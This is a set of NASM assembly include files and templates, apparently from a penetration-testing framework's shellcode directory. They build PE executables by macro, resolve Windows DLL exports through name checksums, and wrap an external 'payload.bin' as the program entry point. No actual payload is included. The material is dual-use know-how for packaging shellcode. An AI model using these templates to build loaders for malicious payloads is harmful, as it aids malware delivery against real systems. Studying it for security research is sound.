%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.rsrc_Begin_FAa:
%define PESectionCur_FAa_Define PESection.rsrc_Begin_FAa
%push PESection.rsrc_Begin
%else
%error PE.INC error: PESection.rsrc_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.rsrc_End 0
%ifctx PESection.rsrc_Begin
MacroPESection_End .rsrc
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.rsrc_RVAa equ PESectionPrec_RVAa_Assign
PESection.rsrc_FSa equ PESection.rsrc_End_FAa-PESection.rsrc_Begin_FAa
PESectionHeader.rsrc_FAa equ PESection.rsrc_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.rsrc_FSa
%pop
%else
%error PE.INC error: PESection.rsrc_End => PESection.rsrc_Begin
%endif
%endmacro
%macro PESections_End 0
%ifctx PESections_Begin
PESections_End_FAa:
PEHeader_SectionsNumber equ PEHeader_SectionsNumber_Assign
PEOptionalHeader_InitializedDataFSa equ PEOptionalHeader_InitializedDataFSa_Assign
PEOptionalHeader_DataRVAa equ PEOptionalHeader_DataRVAa_Assign
%assign PESectionPrec_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign) / PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PEOptionalHeader_ImageVSa equ PESectionPrec_RVAa_Assign
Import_Directorys_RVA equ Import_Directorys_Assign
%repl PESections_End
%else
%error PE.INC error: PESections_End => PESections_Begin
%endif
%endmacro
;============================= Import Directorys =============================
;Import_Directorys_Begin sectionname
%macro Import_Directorys_Begin 1
Import_Directorys_Begin_FA:
%assign Import_Directorys_Assign PESectionCur_RVAa_Assign+Import_Directorys_Begin_FA-PESectionCur_FAa_Define
%push Import_Directorys_Begin
%endmacro
;Import_Directory dlllogicalname
%macro Import_Directory 1
%ifctx Import_Directorys_Begin
dd PESection_RVA(Import.%1_RVAs)
dd 0 ;??? (date 0)
dd 0FFFFFFFFh
dd PESection_RVA(Import.%1_String_Dll)
dd PESection_RVA(Import.%1_VAs)
%else
%error PE.INC error: Import_Directory => Import_Directorys_Begin
%endif
%endmacro
%macro Import_Directorys_End 0
%ifctx Import_Directorys_Begin
times 5 dd 0
Import_Directorys_End_FA:
Import_Directorys_VS equ Import_Directorys_End_FA-Import_Directorys_Begin_FA
%pop
%else
%error PE.INC error: Import_Directorys_End => Import_Directorys_Begin
%endif
%endmacro
;Import_RVAs_Begin dlllogicalname
%macro Import_RVAs_Begin 1
Import.%1_RVAs:
%push Import_RVAs_Begin
%endmacro
;Import_RVA dlllogicalname,functionlogicalname
%macro Import_RVA 2
%ifctx Import_RVAs_Begin
dd PESection_RVA(Import.%1.%2_String_Function)
%else
%error PE.INC error: Import_RVA => Import_RVAs_Begin
%endif
%endmacro
%macro Import_RVAs_End 0
%ifctx Import_RVAs_Begin
dd 0
%pop
%else
%error PE.INC error: Import_RVAs_End => Import_RVAs_Begin
%endif
%endmacro
;Import_VAs_Begin dlllogicalname
%macro Import_VAs_Begin 1
Import.%1_VAs:
%push Import_VAs_Begin
%endmacro
;Import_VA dlllogicalname,functionlogicalname,[va]
%macro Import_VA 2-3 0FFFFFFFFh
%ifctx Import_VAs_Begin
Import.%1.%2: dd %3
%2 equ PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+Import.%1.%2-PESectionCur_FAa_Define
%else
%error PE.INC error: Import_VA => Import_VAs_Begin
%endif
%endmacro
%macro Import_VAs_End 0
%ifctx Import_VAs_Begin
dd 0
%pop
%else
%error PE.INC error: Import_VAs_End => Import_VAs_Begin
%endif
%endmacro
;Import_Strings_Begin dlllogicalname
%macro Import_Strings_Begin 1
Import.%1_Strings:
%push Import_Strings_Begin
%endmacro
;Import_String_Function dlllogicalname,functionlogicalname,"name",[ordinal]
%macro Import_String_Function 3-4 0h
%ifctx Import_Strings_Begin
Import.%1.%2_String_Function:
dw %4
db %3,0
%else
%error PE.INC error: Import_String_Function => Import_Strings_Begin
%endif
%endmacro
;Import_String_Dll dlllogicalname,"dllname"
%macro Import_String_Dll 2
%ifctx Import_Strings_Begin
Import.%1_String_Dll:
db %2,0
%repl Import_String_Dll
%else
%error PE.INC error: Import_String_Dll => Import_Strings_Begin
%endif
%endmacro
%macro Import_Strings_End 0
%ifctx Import_String_Dll
%pop
%else
%error PE.INC error: Import_Strings_End => Import_String_Dll
%endif
%endmacro
;================================== BIN End ==================================
%macro BIN_End 0
%ifctx PESections_End
BIN_End_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
BIN_End_FAa:
%pop
%else
%error PE.INC error: BIN_End => PESections_End
%endif
%endmacro
%endif

55
external/source/shellcode/windows/templates/inc/win32.inc vendored Normal file
View File

@ -0,0 +1,55 @@
; MACROS FOR WIN32 PROGRAMMING v1.0a
; ==================================
;WIN32.INC_NO_EXTERN_IMPORT => pas d'Import
;ExternImport function,dll [,d|[*]]
; <- FUNCTION.INC_CONVENTION
;================================= General ===================================
%ifndef _WIN32.INC
%define _WIN32.INC
%include "function.inc"
%include "language.inc"
%include "win32n.inc"
%include "win32dll.inc"
%macro WIN32.INC 0
FUNCTION.INC
%undef WIN32.INC_NO_EXTERN_IMPORT
%endmacro
%macro WIN32.INC~ 0
FUNCTION.INC~
%undef WIN32.INC_NO_EXTERN_IMPORT
%endmacro
WIN32.INC
%macro ExternImport 2-3
%ifndef ExternImport_%1
%ifndef WIN32.INC_NO_EXTERN_IMPORT
extern %1
import %1 %2
Alias @%1,[%1]
FunctionDefine %1,FUNCTION.INC_CONVENTION
%else
%if %0==3
%ifnum %3
FunctionDefine %1,FUNCTION.INC_CONVENTION,%3
%else
Alias @%1,%3
FunctionDefine %1,FUNCTION.INC_CONVENTION
%endif
%else
Error WIN32,NO_EXTERN_IMPORT => ExternImport %1,%2,d|[*]
%endif
%endif
%define ExternImport_%1
%endif
%endmacro
%endif

390
external/source/shellcode/windows/templates/inc/win32dll.inc vendored Normal file
View File

@ -0,0 +1,390 @@
; MACROS POUR L'IMPORTATION DE FONCTIONS DE DLLS WIN32 v0.9a
; ==========================================================
;WIN32DLL.INC_TABLE_REGISTER = edi = registre qui pointera la table
;WIN32DLL.INC_PUSH => sauvegarde des registres sur la pile
;WIN32DLL.INC_KERNEL32.DLL = WIN32DLL.INC_9X | WIN32DLL.INC_NT
; |WIN32DLL.INC_2000|r contenant l'adresse de base de KERNEL32.DLL
;WIN32DLL.INC_BYTE_BEGIN = 252 = 1er byte du codage dans la table
;GetBase r
; r -> adresse de base à partir de l'adresse originale contenue dans r
;GetChecksum(chaine)
; EAX -> checksum de chaine
;GetVAExportChecksum(base,checksum)
; EAX -> VA de la fonction de checksum à partir de l'Export Table de
; l'adresse de base de la DLL parcourue | 0
;DllBegin
; Dll kernel32.dll,"kernel32.dll"
; [DllFunction LoadLibraryA,...]
; [DllFunction GetProcAddress,...]
; ...
; Dll dll [,"dll"]
; DllFunction function [,"function"|d [,d]]
; ...
; ...
;DllEnd
;<- WIN32.INC_NO_EXTERN_IMPORT,BYTE.INC_NO_00,FUNCTION.INC_CONVENTION
;================================= General ===================================
%ifndef _WIN32DLL.INC
%define _WIN32DLL.INC
%include "win32.inc"
%macro WIN32DLL.INC 0
%define WIN32DLL.INC_TABLE_REGISTER edi
%define WIN32DLL.INC_PUSH
%define WIN32DLL.INC_9X 0BFF70000h
%define WIN32DLL.INC_NT 077F00000h
%define WIN32DLL.INC_2000 077E00000h
%define WIN32DLL.INC_KERNEL32.DLL WIN32DLL.INC_9X
%define WIN32DLL.INC_BYTE_BEGIN 252
%define DllChecksum_Define WIN32DLL.INC_BYTE_BEGIN
%define DllFunction_Define WIN32DLL.INC_BYTE_BEGIN+1
%define DllDll_Define WIN32DLL.INC_BYTE_BEGIN+2
%define DllEnd_Define WIN32DLL.INC_BYTE_BEGIN+3
%endmacro
WIN32DLL.INC
;=================================== DLLs ====================================
%macro GetBase 1
And %1,0FFFF0000h
GetBase_Boucle:
cmp word[%1],'MZ'
JX e,GetBase_Fin,+1
Sub eax,10000h
Jmp GetBase_Boucle,-1
GetBase_Fin:
%endmacro
%macro Function_GetChecksum 0
Function GetChecksum,GetChecksum_Chaine
FunctionBegin
pushf
push esi
push edx
cld
mov esi,[GetChecksum_Chaine]
Mov edx,0
GetChecksum_BoucleChar:
Mov eax,0
lodsb
shl ax,8 ;AX=cc00
add edx,eax ;ajoute le caractère au checksum
Cmp eax,0
JX z,GetChecksum_Fin,+1 ;si fin de chaîne
Mov eax,0
lodsb ;AX=cc
add edx,eax ;ajoute le caractère au checksum
Cmp al,0
JX nz,GetChecksum_BoucleChar,-1 ;si pas fin de chaîne
GetChecksum_Fin:
mov eax,edx
pop edx
pop esi
popf
FunctionEnd
%endmacro
%macro Function_GetVAExportChecksum 0
Function GetVAExportChecksum,GetVAExportChecksum_VA,GetVAExportChecksum_Checksum
FunctionBegin
pushf
push edi
push esi
push edx
push ecx
push ebx
cld
mov esi,[GetVAExportChecksum_VA]
mov ebx,esi
mov ebx,[byte ebx+03Ch]
add ebx,esi ;EBX=adresse header PE
mov ebx,[byte ebx+078h]
add ebx,esi ;EBX=adresse Export Table
mov edx,[byte ebx+018h] ;EDX=nombre noms
Mov ecx,0 ;ECX=indice courant liste adresses noms
GetVAExportChecksum_BoucleNom:
mov edi,[byte ebx+020h]
add edi,esi ;EDI=adresse liste adresses noms
mov edi,[edi+4*ecx]
add edi,esi ;EDI=adresse chaîne
push edx
mov edx,[GetVAExportChecksum_Checksum] ;EDX=checksum recherché
xchg esi,edi ;ESI=adresse chaîne
GetVAExportChecksum_BoucleChar:
Mov eax,0
lodsb
shl ax,8 ;AX=cc00
sub edx,eax ;soustrait le caractère du checksum
Cmp eax,0
JX z,GetVAExportChecksum_FinNom,+1 ;si fin de chaîne
Mov eax,0
lodsb ;AX=cc
sub edx,eax ;soustrait le caractère du checksum
Cmp al,0
JX nz,GetVAExportChecksum_BoucleChar,-1 ;si pas fin de chaîne
GetVAExportChecksum_FinNom:
xchg esi,edi ;EDI=adresse chaîne
test edx,edx
pop edx
JX z,GetVAExportChecksum_NomTrouve,+1 ;si checksum recherchée
inc ecx
cmp ecx,edx
JX nae,GetVAExportChecksum_BoucleNom,-1 ;si pas fin => boucle suivant
Mov eax,0
Jmp GetVAExportChecksum_Fin,+1 ;sinon fin
GetVAExportChecksum_NomTrouve:
Mov eax,0
mov edi,[byte ebx+024h]
add edi,esi ;EDI=adresse liste ordinaux
mov ax,[edi+2*ecx] ;AX=ordinal
mov edi,[byte ebx+01Ch]
add edi,esi ;EDI=adresse liste adresses
mov eax,[edi+4*eax]
add eax,esi ;EAX=adresse fonction
GetVAExportChecksum_Fin:
pop ebx
pop ecx
pop edx
pop esi
pop edi
popf
FunctionEnd
%endmacro
%macro DllBegin 0
%ifctx Dll
Error WIN32DLL,DllBegin =X=> DllBegin
%else
%push Dll
%undef Dll_LoadLibraryA_Define
%undef Dll_GetProcAddress_Define
%undef Dll_kernel32.dll_Define
%assign Dll_Function_Assign 1
%define FUNCTION.INC_CONVENTION Std
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%ifdef WIN32DLL.INC_PUSH
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
push ebp
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
push edi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
push esi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
push edx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
push ecx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
push ebx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
push eax
%endif
%endif
Call %$End,+1
%endif
%endif
%endmacro
%macro Dll 1-2
%ifctx Dll
%define Dll_Dll_Define %1
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%if %0==2
%ifnidn %1,kernel32.dll
%define Dll_kernel32.dll
db %2,DllDll_Define
%endif
%else
Error WIN32DLL,NO_EXTERN_IMPORT => Dll dll,"dll"
%endif
%endif
%else
Error WIN32DLL,Dll => DllBegin
%endif
%endmacro
%macro DllFunctionExternImport 2-3
%if %0==2
%ifstr %2
db %2,DllFunction_Define
%else
db DllChecksum_Define
dd ~(%2)
%endif
%1_Equ equ Dll_Function_Assign
ExternImport %1,Dll_Dll_Define,[byte WIN32DLL.INC_TABLE_REGISTER+%1_Equ]
%assign Dll_Function_Assign Dll_Function_Assign+4
%else
ExternImport %1,Dll_Dll_Define,%3
%endif
%endmacro
%macro DllFunction 1-3
%ifctx Dll
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%if %0>1
%ifidn %1,LoadLibraryA
%if %0==3
DllFunctionExternImport %1,%2,%3
%define Dll_LoadLibraryA_Define
%endif
%elifidn %1,GetProcAddress
%if %0==3
DllFunctionExternImport %1,%2,%3
%define Dll_GetProcAddress_Define
%endif
%else
%ifndef Dll_LoadLibraryA_Define
DllFunctionExternImport LoadLibraryA,000023761h ;'oL'+'da'+'iL'+'rb'+'ra'+'Ay'
%define Dll_LoadLibraryA_Define
%endif
%ifndef Dll_GetProcAddress_Define
DllFunctionExternImport GetProcAddress,00002DBA1h ;'eG'+'Pt'+'or'+'Ac'+'dd'+'er'+'ss'
%define Dll_GetProcAddress_Define
%endif
%if %0==2
%ifstr %2
%ifndef Dll_kernel32.dll
db "kernel32.dll",DllDll_Define
%define Dll_kernel32.dll
%endif
%endif
DllFunctionExternImport %1,%2
%else
DllFunctionExternImport %1,%2,%3
%endif
%endif
%else
Error WIN32DLL,NO_EXTERN_IMPORT => DllFunction function,"function"|d [,d]
%endif
%else
ExternImport %1,Dll_Dll_Define
%endif
%else
Error WIN32DLL,DllFunction => DllBegin
%endif
%endmacro
%macro DllEnd 0
%ifctx Dll
%ifdef WIN32.INC_NO_EXTERN_IMPORT
db DllEnd_Define
Function_GetVAExportChecksum
%$End:
%ifnidn WIN32DLL.INC_KERNEL32.DLL,edx
Mov edx,WIN32DLL.INC_KERNEL32.DLL
%endif
pop esi ;ESI=offset jump table
push esi
mov edi,esi ;EDI=offset jump table
mov ebp,esi
dec ebp ;EBP=offset jump table-1
DllEnd_BoucleNom:
mov ebx,esi ;EBX=dÚbut chaîne courante
DllEnd_BoucleChar:
lodsb
cmp al,WIN32DLL.INC_BYTE_BEGIN
JX b,DllEnd_BoucleChar,-1 ;si <252
dec esi ;sinon >=252 =>chaine ou fin
Mov ah,0
mov [esi],ah ;00 de fin de chaîne
inc esi
cmp al,WIN32DLL.INC_BYTE_BEGIN
JX e,DllEnd_252,+1 ;si =252
cmp al,WIN32DLL.INC_BYTE_BEGIN+2
JX a,DllEnd_End,+1 ;si =255
push edi ;sauve EDI
push esi ;sauve ESI
JX e,DllEnd_254,+1 ;si =254
DllEnd_253: ;sinon =253 => fonction
push edx ;sauve EDX
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
GetProcAddress(edx,ebx)
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
pop edx
pop esi
pop edi
stosd ;ajoute à la jump table
Jmp DllEnd_BoucleNom,-1
DllEnd_252: ;=252 => checksum
lodsd
not eax
TemporaryBegin dword,-,eax
%define BYTE.INC_TEMPORARY_REGISTER Temporary_Ret
GetVAExportChecksum(edx,eax)
%undef BYTE.INC_TEMPORARY_REGISTER
TemporaryEnd
stosd ;ajoute à la jump table
Jmp DllEnd_BoucleNom,-1
DllEnd_254: ;=254 => dll
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
LoadLibraryA(ebx)
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
mov edx,eax ;EDX=handle de la DLL
pop esi
pop edi
Jmp DllEnd_BoucleNom,-1
DllEnd_End: ;=255
pop WIN32DLL.INC_TABLE_REGISTER
dec WIN32DLL.INC_TABLE_REGISTER
%ifdef WIN32DLL.INC_PUSH
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
pop eax
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
pop ebx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
pop ecx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
pop edx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
pop esi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
pop edi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
pop ebp
%endif
%endif
%endif
%pop
%else
Error WIN32DLL,DllEnd => DllBegin
%endif
%endmacro
%endif

12039
external/source/shellcode/windows/templates/inc/win32n.inc vendored Normal file
View File

File diff suppressed because it is too large Load Diff

3
external/source/shellcode/windows/templates/linux_template.asm vendored Normal file
View File

@ -0,0 +1,3 @@
global _start
_start:
incbin "payload.bin"

71
external/source/shellcode/windows/templates/win32_template.asm vendored Normal file
View File

@ -0,0 +1,71 @@
%include "pe.inc"
BIN_Begin
MZHeader
MZExtendedHeader
MZSection.text_Begin
push cs
pop ds
mov dx,MZSection.text_VA(text_string)
mov ah,09
int 21h
mov ax,4C01h
int 21h
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
MZSection.text_End
PEHeader
%define PEOptionalheader_EipRVA PESection.text_RVA(PayloadEntry)
PEOptionalHeader_Begin
PEOptionalHeader_Directory Export,0,0
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
PEOptionalHeader_End
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS| PESectionHeader_Flags_WRITEACCESS
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESections_Begin
PESection.text_Begin
PayloadEntry:
incbin "payload.bin"
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
PESection.text_End
PESection.rdata_Begin
db 0x90
PESection.rdata_End
PESection.data_Begin
db 0x90
PESection.data_End
PESection.bss_Begin
resb 0x100
PESection.bss_End
PESection.idata_Begin
Import_Directorys_Begin .idata
Import_Directory KERNEL32
Import_Directorys_End
Import_RVAs_Begin KERNEL32
Import_RVA KERNEL32,ExitProcess
Import_RVAs_End
Import_VAs_Begin KERNEL32
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
Import_VAs_End
Import_Strings_Begin KERNEL32
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
Import_String_Dll KERNEL32,"KERNEL32.DLL"
Import_Strings_End
PESection.idata_End
PESections_End
BIN_End